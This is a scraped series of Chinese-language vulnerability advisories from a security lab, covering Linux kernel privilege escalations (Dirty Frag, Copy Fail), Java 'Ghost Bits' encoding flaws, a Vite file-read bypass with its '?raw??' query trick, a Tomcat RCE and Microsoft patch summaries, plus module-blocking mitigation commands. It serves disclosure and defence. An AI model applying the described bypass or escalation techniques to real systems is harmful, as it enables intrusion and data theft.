近日，天融信阿尔法实验室监测到Linux Kernel主线修复了一个本地权限提升漏洞Dirty Frag。该漏洞已存在9年，影响几乎所有主流企业级和桌面Linux发行版。由于该漏洞是一个逻辑漏洞，因此漏洞利用成功率极高。当前，此漏洞的细节及Exp已经公开。

0x00 背景介绍

近日，天融信阿尔法实验室监测到Linux Kernel主线修复了一个本地权限提升漏洞Dirty Frag。该漏洞已存在9年，影响几乎所有主流企业级和桌面Linux发行版。由于该漏洞是一个逻辑漏洞，因此漏洞利用成功率极高。当前，此漏洞的细节及Exp已经公开，暂未发现主流发行版发布针对该问题的补丁或更新，因此，请受影响用户立即根据修复建议对该漏洞进行防御。

0x01 漏洞描述

Linux内核是一个开源、宏内核但支持动态模块加载的操作系统核心，负责管理硬件资源并为上层软件提供运行环境。它通过进程调度、内存管理、虚拟文件系统、网络协议栈和设备驱动等关键子系统，实现对CPU、内存、磁盘及外设的抽象与调度，并提供稳定、安全和高效的接口供应用程序使用。凭借高可移植性、丰富的驱动支持和强大的社区协作，其已成为从嵌入式设备到超级计算机、从安卓系统到云服务器广泛采用的基础核心。

Dirty Frag是Linux Kernel网络子系统中的一种漏洞类别，其通过链接xfrm-ESP Page-Cache Write漏洞和RxRPC Page-Cache Write漏洞在大多数Linux发行版上获得root权限。Dirty Frag与Dirty Pipe和Copy Fail的形成原因具有高度的相似性，但具体细节不同。

这两个漏洞的共同之处在于，在零拷贝（zero-copy）发送路径中，当splice()函数将攻击者仅拥有读取权限的页面缓存页引用直接植入发送方skb的片段槽时，接收方内核代码会对该片段执行原地加密。结果，非特权用户仅拥有读取权限的文件（例如/etc/passwd或/usr/bin/su）的页面缓存会被修改，并且后续每次读取都会看到修改后的副本，从而实现提权。

请注意，无论algif_aead模块是否可用，Dirty Frag漏洞都可能被触发。换句话说，即使在应用了公开已知的Copy Fail缓解措施（algif_aead黑名单）的系统上，您的Linux系统仍然容易受到Dirty Frag漏洞的攻击。

漏洞复现（复现环境Ubuntu 22.04.4 LTS）:

0x02 漏洞编号

暂无

0x03 漏洞等级

高危

0x04 受影响版本

几乎影响所有主流企业级和桌面Linux发行版。

xfrm-ESP Page-Cache Write漏洞影响范围：

Linux Kernel主线Commit >= cac2661c53f3（2017-01-17）

RxRPC Page-Cache Write漏洞影响范围：

Linux Kernel主线Commit >= 2dc334f1a63a（2023-06-08）

已知受影响的发行版：

Ubuntu 22.04.4 LTS（6.8.0-40-generic）

Ubuntu 24.04.4 LTS（6.17.0-23-generic）

RHEL 10.1（6.12.0-124.49.1.el10_1.x86_64）

openSUSE Tumbleweed（7.0.2-1-default）

CentOS Stream 10（6.12.0-224.el10.x86_64）

AlmaLinux 10（6.12.0-124.52.3.el10_1.x86_64）

Fedora 44（6.19.14-300.fc44.x86_64）

0x05 修复建议

Linux Kernel官方暂未发布正式补丁，可通过以下命令删除存在漏洞的内核模块，进行临时缓解。

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

0x06 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

跳转微信打开

近日，天融信阿尔法实验室监测到安全研究员披露了Java生态中的一种新型安全问题，通常被称为Ghost Bits（幽灵比特），其根源在于“字符视图”与“字节视图”不一致，可能引发部分安全防护产品绕过、路径穿越、文件上传绕过、CRLF 注入、反序列化绕过等风险。

0x00 背景介绍

近日，天融信阿尔法实验室监测到安全研究员披露了Java生态中的一种新型安全问题，通常被称为Ghost Bits（幽灵比特），其根源在于“字符视图”与“字节视图”不一致，可能引发部分安全防护产品绕过、路径穿越、文件上传绕过、CRLF 注入、反序列化绕过等风险。该问题不是单一 CVE，而是一类底层编码与解析逻辑缺陷，影响面较广，建议受影响用户尽快排查并修复。

0x01 漏洞描述

Java 是目前应用最广泛的编程语言之一，从 Web 服务器、企业应用到嵌入式系统都有其身影。Java 的类型系统中，char类型为 16 位 Unicode 代码单元，而byte类型仅为 8 位。当代码中发生char -> byte的强制类型转换、位运算掩码、OutputStream.write(int)、DataOutputStream.writeBytes(String) 等时，高 8 位会被静默丢弃，只保留低 8 位，被丢弃的高位数据即被称为 "Ghost Bits"。

Ghost Bits 风险的核心在于，上层安全检查看到的字符串语义，与底层最终执行的字节语义可能不一致。上层按字符语义做校验时看到的是安全字符串，而底层按字节语义执行时，低 8 位可能折叠成危险的 ASCII 字节，从而触发真实漏洞。经过身份认证的攻击者可通过精心构造的 Unicode 字符输入，绕过业务校验、路径检查等安全机制，实现文件上传绕过、路径穿越、任意文件读取、认证绕过、SMTP 注入、HTTP 请求走私、Header 注入等多种攻击。该风险已在 Tomcat、Spring Framework、Jetty、Fastjson、Jackson、Openfire、Jira、Confluence 等多个主流 Java 组件中被证实存在实际可利用的漏洞。

0x02 漏洞编号

暂无

0x03 漏洞等级

高危

0x04 受影响版本

所有存在以下高危代码写法的 Java 应用和组件：

1、(byte) ch - char 到 byte 的强制类型转换

2、ch & 0xff / ch & 255 / 0xff & ch - 位运算截断

3、baos.write(ch) - 直接将 char 写入字节流

4、DataOutputStream.writeBytes(String s) - 按字节写入字符串

5、OutputStream.write(int) - 直接写入 int 值的低 8 位

6、StringBufferInputStream.read() - 字符流到字节流转换

7、String.getBytes(int, int, byte[], int) - 过时的字节获取方法

8、RandomAccessFile.writeBytes() - 按字节写入

9、URLDecoder.decode() - URL 解码相关处理

已知受影响的 Java 组件：

Apache Tomcat、Spring Framework、Eclipse Jetty、Fastjson、Jackson、Openfire、Apache HttpClient、Angus Mail / Jakarta Mail、Jira、Confluence、GeoServer

0x05 修复建议

1、临时缓解措施

如果暂时无法完成代码修复和组件升级，可采取以下缓解措施：

（1）对用户输入进行严格的字符范围校验，拒绝包含高Unicode字符的关键输入字段（文件名、路径、邮箱地址、HTTP Header 等）。

（2）若非必要，避免在互联网上暴露存在风险的 Java 应用服务。

2、代码修复

（1）禁止隐式 char -> byte 截断：避免使用(byte) ch等强制类型转换写法，改用显式的字符编码转换，如StandardCharsets.UTF_8.encode()。

（2）统一校验与执行语义：先把输入还原成最终会被执行的字节语义，再进行安全校验，确保检查和执行在同一语义空间。

（3）输入规范化：在输入校验阶段前对输入进行统一的编码规范化处理。

（4）升级受影响组件：将受已知漏洞影响的 Java 组件按照官方安全公告升级至安全版本。

0x06 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

跳转微信打开

4月30日，天融信阿尔法实验室监测到Linux Kernel修复了一个本地权限提升漏洞（CVE-2026-31431），其被称为Copy Fail。该漏洞利用复杂度较低，且影响过去9年内大多数主流Linux发行版，对云服务器、容器宿主机、多租户环境等构成较高风险。

0x00 背景介绍

4月30日，天融信阿尔法实验室监测到Linux Kernel修复了一个本地权限提升漏洞（CVE-2026-31431），其被称为Copy Fail。该漏洞利用复杂度较低，且影响过去9年内大多数主流Linux发行版，对云服务器、容器宿主机、多租户环境等构成较高风险。此漏洞的PoC和细节已公开，由于此漏洞影响范围极广，建议受影响用户立即修复该漏洞。

0x01 漏洞描述

Linux内核是一个开源、宏内核但支持动态模块加载的操作系统核心，负责管理硬件资源并为上层软件提供运行环境。它通过进程调度、内存管理、虚拟文件系统、网络协议栈和设备驱动等关键子系统，实现对CPU、内存、磁盘及外设的抽象与调度，并提供稳定、安全和高效的接口供应用程序使用。凭借高可移植性、丰富的驱动支持和强大的社区协作，其已成为从嵌入式设备到超级计算机、从安卓系统到云服务器广泛采用的基础核心。

CVE-2026-31431是Linux Kernel加密子系统中的一个逻辑缺陷漏洞，可导致本地权限提升。经过身份认证的本地低权限攻击者可利用AF_ALG加密接口与splice()系统调用的组合，向任意可读文件的页缓存写入受控的4字节数据，从而篡改setuid程序，无需条件竞争即可直接获得root权限。

漏洞复现（复现环境Ubuntu 22.04.4 LTS）:

0x02 漏洞编号

CVE-2026-31431

0x03 漏洞等级

高危

0x04 受影响版本

72548b093ee3 <= Linux Kernel commit < a664bf3d603d

已知受影响的发行版：

Ubuntu 22.04 LTS

Ubuntu 24.04 LTS

Ubuntu 26.04 LTS

Amazon Linux 2023

Red Hat Enterprise Linux 10

Red Hat Enterprise Linux 9

Red Hat Enterprise Linux 8

SUSE 16

Kali Linux 2026.1

Debian 13

Linux Mint 22.3

Manjaro 26.0.4

0x05 修复建议

1、临时缓解措施

如果暂时无法升级，可禁用 algif_aead 内核模块：

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf

rmmod algif_aead 2>/dev/null || true

2、升级修复

官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，升级至安全版本。

Linux Kernel 6.18: 升级至 6.18.22 或更高版本

https://git.kernel.org/stable/c/fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8

Linux Kernel 6.19: 升级至 6.19.12 或更高版本

https://git.kernel.org/stable/c/ce42ee423e58dffa5ec03524054c9d8bfd4f6237

Linux Kernel 7.0: 升级至 7.0 (或应用相关补丁)

https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5

旧版本内核：请应用官方 Commit a664bf3d603d (Revert to operating out-of-place)。

针对 Ubuntu、Red Hat Enterprise Linux 等用户，发行版官方暂未全部发布安全更新，请及时关注官方安全公告：

Ubuntu 安全公告：

https://ubuntu.com/security/CVE-2026-31431

Red Hat 安全公告：

https://access.redhat.com/security/cve/cve-2026-31431

Debian 安全公告：

https://security-tracker.debian.org/tracker/CVE-2026-31431

0x06 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

跳转微信打开

OpenClaw既是AI Agent生态繁荣的典型代表，也是当前智能体安全风险的集中样本。

跳转微信打开

3月26日,天融信阿尔法实验室监测到Vite 官方披露了一个任意文件读取漏洞(CVE-2025-30208)，目前该漏洞POC已公开，建议受影响用户尽快升级。

0x00 背景介绍

3月26日，天融信阿尔法实验室监测到Vite 官方披露了一个任意文件读取漏洞(CVE-2025-30208)，目前该漏洞POC已公开，建议受影响用户尽快升级。

Vite 是一个现代前端构建工具，它旨在提供快速的开发体验，尤其适合现代 JavaScript 框架（如 Vue）,凭借其快速的启动时间和流畅的开发体验，成为越来越多开发者的首选。

该漏洞因为`@fs` 拒绝访问 Vite 服务允许列表之外的文件。在 URL 中添加 `?raw??` 或 `?import&raw??` 可绕过此限制并返回文件内容（如果存在）。之所以存在此绕过，是因为尾随分隔符（例如 `?`）在多个地方被删除，但在查询字符串正则表达式中没有考虑到这一点。导致攻击者可以绕过保护机制，非法访问项目根目录外的敏感文件。

0x06 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

点击文末“阅读原文”，即可获取完整报告！

阅读原文

跳转微信打开

3月11日，天融信阿尔法实验室监测到Tomcat官方发布了一个安全公告，修复了一个特定条件的远程代码执行漏洞（CVE-2025-24813）。建议受影响用户尽快升级。

0x00 背景介绍

3月11日，天融信阿尔法实验室监测到Tomcat官方发布了一个安全公告，修复了一个特定条件的远程代码执行漏洞（CVE-2025-24813），建议受影响用户尽快升级。

当应用程序启用servlet写入功能（默认情况下禁用）、Tomcat使用基于文件session机制和存储位置（默认路径）、 服务器启用了partial PUT（默认启用）、依赖库存在反序列化利用链时，未授权攻击者可能利用该漏洞造成远程代码执行。

0x06 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年12月11日，天融信阿尔法实验室监测到微软官方发布了12月安全更新。此次更新共修复72个漏洞，其中16个严重漏洞、55个重要漏洞、1个中危漏洞。

0x00 背景介绍

2024年12月11日，天融信阿尔法实验室监测到微软官方发布了12月安全更新。此次更新共修复72个漏洞，其中16个严重漏洞(Critical)、55个重要漏洞(Important)、1个中危漏洞(Moderate)。其中权限提升漏洞27个、远程代码执行漏洞31个、信息泄露漏洞7个、拒绝服务漏洞5个、欺骗漏洞2个。

• 在野利用和公开披露漏洞

• CVE-2024-49138：Windows通用日志文件系统驱动本地权限提升漏洞

• 漏洞利用可能性较大的漏洞

• CVE-2024-49070：Microsoft SharePoint远程代码执行漏洞
  

• CVE-2024-49088、CVE-2024-49090：Windows通用日志文件系统驱动本地权限提升漏洞
  

• CVE-2024-49093：Windows Resilient File System(ReFS)本地权限提升漏洞
  

• CVE-2024-49122：Microsoft消息队列(MSMQ)远程代码执行漏洞

• CVE-2024-49114：Windows Cloud Files微过滤器驱动本地权限提升漏洞
  

• 高评分漏洞

• CVE-2024-49112：Windows轻型目录访问协议(LDAP)远程代码执行漏洞
  

• CVE-2024-49085：Windows路由和远程访问服务(RRAS)远程代码执行漏洞

• CVE-2024-49106：Windows远程桌面服务远程代码执行漏洞
  

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年11月13日，天融信阿尔法实验室监测到微软官方发布了11月安全更新。此次更新共修复89个漏洞，其中4个严重漏洞、84个重要漏洞、1个中危漏洞。

0x00 背景介绍

2024年11月13日，天融信阿尔法实验室监测到微软官方发布了11月安全更新。此次更新共修复89个漏洞，其中4个严重漏洞(Critical)、84个重要漏洞(Important)、1个中危漏洞(Moderate)。

本次微软安全更新涉及组件包括：Windows Package Library Manager、Microsoft Virtual Hard Drive、Windows SMBv3 Client/Server、Microsoft Windows DNS、Windows NTLM、Windows Telephony Service、Windows VMSwitch、Windows Kernel、Windows Secure Kernel Mode、Windows DWM Core Library、Windows SMB、Windows Active Directory Certificate Services、Microsoft Office Excel、Windows Win32 Kernel Subsystem等多个产品和组件。

• 在野利用和公开披露漏洞

• CVE-2024-43451：NTLM 哈希泄露欺骗漏洞

• CVE-2024-49039：Windows 任务计划程序特权提升漏洞

• CVE-2024-49019：Active Directory 证书服务特权提升漏洞

• CVE-2024-49040：Microsoft Exchange 服务器欺骗漏洞

• 漏洞利用可能性较大的漏洞

• CVE-2024-43623：Windows NT 操作系统内核特权提升漏洞
  

• CVE-2024-43629：Windows DWM 核心库特权提升漏洞

• CVE-2024-43630：Windows 内核特权提升漏洞

• CVE-2024-43636：Win32k 特权提升漏洞

• CVE-2024-49033：Microsoft Word 安全功能绕过漏洞

• 高评分漏洞

• CVE-2024-43602：Azure CycleCloud 远程代码执行漏洞
  

• CVE-2024-43639：Windows Kerberos 远程代码执行漏洞
  

• CVE-2024-43498：.NET 和 Visual Studio 远程代码执行漏洞

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年10月09日，天融信阿尔法实验室监测到微软官方发布了10月安全更新。此次更新共修复117个漏洞，其中3个严重漏洞、112个重要漏洞、2个中危漏洞。

0x00 背景介绍

2024年10月09日，天融信阿尔法实验室监测到微软官方发布了10月安全更新。此次更新共修复117个漏洞，其中3个严重漏洞(Critical)、112个重要漏洞(Important)、2个中危漏洞(Moderate)。其中权限提升漏洞28个、远程代码执行漏洞42个、信息泄露漏洞6个、拒绝服务漏洞26个、欺骗漏洞7个、安全功能绕过漏洞7个、篡改漏洞1个。

本次微软安全更新涉及组件包括：Microsoft Management Console、Windows MSHTML Platform、Windows Hyper-V、Winlogon、Windows Kernel、Microsoft Graphics Component、Windows Storage Port Driver、OpenSSH for Windows、Microsoft Office、Remote Desktop Client、Windows Remote Desktop Services、Windows Routing and Remote Access Service (RRAS)、Windows Mobile Broadband等多个产品和组件。

• 在野利用和公开披露漏洞

• CVE-2024-43572：Microsoft Management Console远程代码执行漏洞

• CVE-2024-43573：Windows MSHTML平台欺骗漏洞

• CVE-2024-20659：Windows Hyper-V安全功能绕过漏洞

• CVE-2024-43583：Winlogon本地权限提升漏洞

• 漏洞利用可能性较大的漏洞

• CVE-2024-43502：Windows Kernel本地权限提升漏洞
  

• CVE-2024-43509、CVE-2024-43556：Windows图形组件本地权限提升漏洞
  

• CVE-2024-43560：Windows Storage Port驱动本地权限提升漏洞
  

• CVE-2024-43581、CVE-2024-43615：Windows OpenSSH远程代码执行漏洞
  

• CVE-2024-43609：Microsoft Office欺骗漏洞
  

• 高评分漏洞

• CVE-2024-43468：Microsoft Configuration Manager远程代码执行漏洞
  

• CVE-2024-38124：Windows Netlogon权限提升漏洞
  

• CVE-2024-43533：Remote Desktop Client远程代码执行漏洞
  

• CVE-2024-43607：Windows路由和远程访问服务(RRAS)远程代码执行漏洞

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年9月11日，天融信阿尔法实验室监测到微软官方发布了9月安全更新。此次更新共修复79个漏洞，其中7个严重漏洞、71个重要漏洞、1个中危漏洞。

0x00 背景介绍

2024年9月11日，天融信阿尔法实验室监测到微软官方发布了9月安全更新。此次更新共修复79个漏洞，其中7个严重漏洞(Critical)、71个重要漏洞(Important)、1个中危漏洞(Moderate)。其中权限提升漏洞30个、远程代码执行漏洞23个、信息泄露漏洞11个、拒绝服务漏洞8个、欺骗漏洞2个、安全功能绕过漏洞4个、XSS漏洞1个。

• 在野利用和公开披露漏洞

• CVE-2024-38014：Windows Installer本地权限提升漏洞

• CVE-2024-38217：Windows网络标记(MOTW)安全功能绕过漏洞

• CVE-2024-38226：Microsoft Publisher安全功能绕过漏洞

• CVE-2024-43491：Windows Update远程代码执行漏洞

• 漏洞利用可能性较大的漏洞

• CVE-2024-38018、CVE-2024-43464、CVE-2024-38227、CVE-2024-38228：Microsoft SharePoint Server远程代码执行漏洞
  

• CVE-2024-38237、CVE-2024-38238、CVE-2024-38241、CVE-2024-38242、CVE-2024-38243、CVE-2024-38244、CVE-2024-38245：Kernel Streaming服务驱动本地权限提升漏洞
  

• CVE-2024-38246、CVE-2024-38252、CVE-2024-38253：Windows Win32k本地权限提升漏洞
  

• CVE-2024-38247、CVE-2024-38249：Windows图形组件本地权限提升漏洞
  

• CVE-2024-43457：Windows设置和部署本地权限提升漏洞
  

• CVE-2024-43461：Windows MSHTML平台欺骗漏洞
  

• CVE-2024-43487：Windows网络标记(MOTW)安全功能绕过漏洞

• 高评分漏洞

• CVE-2024-38220：Azure Stack Hub权限提升漏洞
  

• CVE-2024-26186：Microsoft SQL Server Native Scoring远程代码执行漏洞
  

• CVE-2024-21416：Windows TCP/IP远程代码执行漏洞

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年8月14日，天融信阿尔法实验室监测到微软官方发布了8月安全更新。此次更新共修复90个漏洞（不包含3个外部分配漏洞和本月早些时候发布的9个Edge漏洞），其中7个严重漏洞、80个重要漏洞、3个中危漏洞。

0x00 背景介绍

2024年8月14日，天融信阿尔法实验室监测到微软官方发布了8月安全更新。此次更新共修复90个漏洞（不包含3个外部分配漏洞和本月早些时候发布的9个Edge漏洞），其中7个严重漏洞(Critical)、80个重要漏洞(Important)、3个中危漏洞(Moderate)。其中权限提升漏洞36个、远程代码执行漏洞30个、信息泄露漏洞9个、拒绝服务漏洞6个、欺骗漏洞5个、安全功能绕过漏洞1个、XSS漏洞2个、篡改漏洞1个。

• 在野利用和公开披露漏洞

• CVE-2024-38106：Windows Kernel本地权限提升漏洞

• CVE-2024-38107：Windows Power Dependency Coordinator本地权限提升漏洞

• CVE-2024-38178：Jscript9脚本引擎内存损坏漏洞

• CVE-2024-38189：Microsoft Project远程代码执行漏洞

• CVE-2024-38193：Windows WinSock辅助功能驱动本地权限提升漏洞

• CVE-2024-38213：Windows网络标记(MOTW)安全功能绕过漏洞

• CVE-2024-21302：Windows Secure Kernel Mode本地权限提升漏洞

• CVE-2024-38199：Windows Line Printer Daemon(LPD)服务远程代码执行漏洞

• CVE-2024-38200：Microsoft Office欺骗漏洞

• CVE-2024-38202：Windows Update Stack本地权限提升漏洞

• 漏洞利用可能性较大的漏洞

• CVE-2024-38063：Windows TCP/IP远程代码执行漏洞
  

• CVE-2024-38125、CVE-2024-38144：Kernel Streaming WOW Thunk服务驱动权限提升漏洞
  

• CVE-2024-38133：Windows Kernel本地权限提升漏洞
  

• CVE-2024-38141：Windows WinSock辅助功能驱动本地权限提升漏洞
  

• CVE-2024-38147、CVE-2024-38150：Microsoft DWM核心库本地权限提升漏洞
  

• CVE-2024-38148：Windows Secure Channel拒绝服务漏洞
  

• CVE-2024-38163：Windows Update Stack本地权限提升漏洞

• CVE-2024-38196：Windows通用日志文件系统驱动本地权限提升漏洞

• CVE-2024-38198：Windows Print Spooler权限提升漏洞

• 高评分漏洞

• CVE-2024-38140：Windows可靠的组播传输驱动(RMCAST)远程代码执行漏洞
  

• CVE-2024-38159、CVE-2024-38160：Windows Network Virtualization远程代码执行漏洞
  

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

8月9日，天融信阿尔法实验室监测到被命名为“狂躁许可（MadLicense）”的远程桌面许可服务远程代码执行漏洞（CVE-2024-38077）的部分漏洞细节及PoC伪代码在互联网上公开，微软已在2024年7月月度更新中发布此漏洞的补丁。

0x00 背景介绍

8月9日，天融信阿尔法实验室监测到被命名为“狂躁许可（MadLicense）”的远程桌面许可服务远程代码执行漏洞（CVE-2024-38077）的部分漏洞细节及PoC伪代码在互联网上公开，微软已在2024年7月月度更新中发布此漏洞的补丁。

远程桌面许可服务（Remote Desktop Licensing，RDL）是Windows Server的一个组件，用于管理和颁发远程桌面服务的许可证，确保对远程应用程序和桌面进行安全且合规的访问。该服务被广泛部署于开启了Windows远程桌面服务（3389端口）的服务器上。RDL服务不是默认安装，但很多管理员会手动开启。

CVE-2024-38077

严重

Windows Server 2012 R2 (Server Core installation)

• Windows自动更新
  

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x07 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年7月10日，天融信阿尔法实验室监测到微软官方发布了7月安全更新。此次更新共修复138个漏洞（不包含4个外部分配漏洞），其中5个严重漏洞、132个重要漏洞、1个中危漏洞。

0x00 背景介绍

2024年7月10日，天融信阿尔法实验室监测到微软官方发布了7月安全更新。此次更新共修复138个漏洞（不包含4个外部分配漏洞），其中5个严重漏洞(Critical)、132个重要漏洞(Important)、1个中危漏洞(Moderate)。其中权限提升漏洞24个、远程代码执行漏洞59个、信息泄露漏洞8个、拒绝服务漏洞17个、欺骗漏洞6个、安全功能绕过漏洞24个。

• 在野利用和公开披露漏洞

• CVE-2024-38080：Windows Hyper-V本地权限提升漏洞

• CVE-2024-38112：Windows MSHTML平台欺骗漏洞

• CVE-2024-35264：.NET和Visual Studio远程代码执行漏洞

• 漏洞利用可能性较大的漏洞

• CVE-2024-38021：Microsoft Office远程代码执行漏洞
  

• CVE-2024-38023、CVE-2024-38024、CVE-2024-38094：Microsoft SharePoint Server远程代码执行漏洞
  

• CVE-2024-38052、CVE-2024-38054：Kernel Streaming WOW Thunk服务驱动本地权限提升漏洞
  

• CVE-2024-38059、CVE-2024-38066：Windows Win32k本地权限提升漏洞
  

• CVE-2024-38060：Windows Imaging组件远程代码执行漏洞
  

• CVE-2024-38079、CVE-2024-38085：Windows图形组件本地权限提升漏洞
  

• CVE-2024-38099：Windows Remote Desktop授权服务拒绝服务漏洞

• CVE-2024-38100：Windows File Explorer本地权限提升漏洞

• 高评分漏洞

• CVE-2024-38074、CVE-2024-38076、CVE-2024-38077：Windows Remote Desktop授权服务远程代码执行漏洞
  

• CVE-2024-38089：Microsoft Defender for IoT权限提升漏洞
  

• CVE-2024-20701：SQL Server Native Client OLE DB提供程序远程代码执行漏洞
  

• CVE-2024-28899：Secure Boot安全功能绕过漏洞
  

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

